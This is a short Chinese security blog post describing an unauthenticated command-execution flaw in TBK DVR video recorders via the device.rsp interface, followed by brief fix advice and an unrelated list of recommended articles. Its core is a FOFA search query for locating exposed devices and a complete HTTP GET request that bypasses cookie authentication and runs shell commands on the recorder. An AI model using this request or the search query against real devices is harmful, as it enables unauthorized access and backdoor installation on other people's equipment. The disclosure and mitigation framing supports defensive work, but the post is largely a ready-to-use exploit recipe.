TBKDVR硬盘录像机device.rsp命令执行漏洞

免责声明:本号提供的网络安全信息仅供参考,不构成专业建议。作者不对任何由于使用本文信息而导致的直接或间接损害承担责任。如涉及侵权,请及时与我联系,我将尽快处理并删除相关内容。

漏洞描述

TBK DVR硬盘录像机 device.rsp 接口处存在命令执行漏洞,未经身份验证的远程攻击者可以利用此漏洞绕过cookie认证执行任意系统指令,写入后门文件,获取录像机shell权限。

漏洞再现

fofa:"Location: /login.rsp"
GET /device.rsp?opt=sys&cmd=S_O_S_T_R_E_A_MAX&mdb=sos&mdc=uname%20-a;pwd;ls HTTP/1.1

Host: ip

Cookie: uid=1

修复建议

1、请联系厂商进行修复。 2、如非必要,禁止公网访问该系统。 3、设置白名单访问。

相关推荐
JosieBook4 分钟前
【数据库】时序数据库通过国测认证,TimechoAI开放体验:工业数据的“存”与“智”如何协同?
数据库·时序数据库
神州世通13 分钟前
IP Office内置外显卡兼容性说明
服务器·网络·tcp/ip
ylscode21 分钟前
CVE-2026-31694 漏洞深度分析:Linux 内核 FUSE 组件存在本地提权风险,普通用户可直取 root 权限
linux·运维·服务器
卓怡学长25 分钟前
w263基于springboot + vue 健康饮食管理系统
java·数据库·vue.js·spring boot·spring·intellij-idea
frank00600711 小时前
Rocky 9.8设置本地yum源
服务器
土星云SaturnCloud2 小时前
边缘计算在储气库调峰智能管控中的应用:架构设计与技术解析
服务器·人工智能·ai·边缘计算
GoFly开发者2 小时前
Go语言开发框架GoFlyGen新增 网站安全助手 插件,帮助开发者提供应用安全防护,保障平台系统数据安全。
网络·安全
笺落彼岸2 小时前
SpringBoot3 JDK17集成proguard实现混淆打包
安全·https
阿演2 小时前
DataDjinn v0.2.11:SQL 编辑、AI 协作和表格操作继续打磨
数据库·人工智能·sql
happyprince3 小时前
07_NVIDIA_ModelOpt-Recipe配方系统
网络·modelopt